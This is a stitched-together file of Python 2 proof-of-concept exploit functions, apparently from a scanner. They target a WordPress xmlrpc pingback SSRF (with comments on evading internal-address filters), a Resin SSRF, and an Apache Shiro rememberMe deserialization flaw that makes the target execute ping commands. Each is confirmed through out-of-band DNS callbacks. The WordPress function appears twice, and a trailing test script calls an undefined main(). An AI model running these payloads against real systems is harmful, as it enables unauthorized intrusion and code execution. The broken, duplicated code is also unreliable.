def poc(url):
if '://' not in url:
url = 'http://' + url
targeturl = url.rstrip('/') + "/xmlrpc.php"
c = CloudEye()
dst = c.getRandomDomain('wpssrf')
# 第一个地址段为SSRF的目标地址,格式为(http[s]://IP|DOAMIN)[:(80|8080|443)]。
# 只能这三个端口,外网地址全通,内网地址被过滤,可用8进制突破10开头的地址段。
# 第二个地址段需要该站实际存在的文章地址,用?p=1自动适配。
payload = """
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{target}/</string></value></param>
<param><value><string>{victim}?p=1</string></value></param>
</params>
</methodCall>""".format(target=dst, victim=url.rstrip('/') + '/')
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Content-Type': 'text/xml'}
try:
# 无法从回显判断
requests.post(targeturl, data=payload, headers=header, timeout=req_timeout)
if c.verifyDNS(delay=3):
return True
except Exception, e:
pass
def poc(url):
url = url if '://' in url else 'http://' + url
print iterate_path(url)
for each in iterate_path(url):
try:
c = CloudEye()
domain = c.getRandomDomain('resin')
payload = '/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://%s' % domain
target = each.rstrip('/') + payload
requests.get(target, timeout=5)
if c.verifyDNS(delay=3):
return each
except Exception:
pass
def poc(url):
if '://' not in url:
target = 'https://%s' % url if ':443' in url else 'http://%s' % url
else:
target = url
try:
cloudeye = CloudEye()
domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组
rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码
payload = generator(rce_command, JAR_FILE) # 生成payload
requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求
dnslog = cloudeye.getDnsRecord(delay=2)
if domain in dnslog:
msg = url
for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip
msg += ' - ' + each
return msg
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
targeturl = url.rstrip('/') + "/xmlrpc.php"
c = CloudEye()
dst = c.getRandomDomain('wpssrf')
# 第一个地址段为SSRF的目标地址,格式为(http[s]://IP|DOAMIN)[:(80|8080|443)]。
# 只能这三个端口,外网地址全通,内网地址被过滤,可用8进制突破10开头的地址段。
# 第二个地址段需要该站实际存在的文章地址,用?p=1自动适配。
payload = """
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{target}/</string></value></param>
<param><value><string>{victim}?p=1</string></value></param>
</params>
</methodCall>""".format(target=dst, victim=url.rstrip('/') + '/')
header = {
'User-Agent':
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Content-Type': 'text/xml'
}
try:
# 无法从回显判断
requests.post(targeturl,
data=payload,
headers=header,
timeout=req_timeout)
if c.verifyDNS(delay=3):
return True
except Exception, e:
pass
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Author: rivir
Date: 2020/2/22
"""
import sys
sys.path.append('../')
from plugin.cloudeye import CloudEye
c = CloudEye()
a = c.getRandomDomain('cdxy')
try:
requests.get('http://' + a, timeout=1)
except Exception:
pass
print c.verifyDNS(delay=0)
print c.verifyHTTP(delay=0)
print c.getDnsRecord(delay=0)
print c.getHttpRecord(delay=0)
if __name__ == "__main__":
main()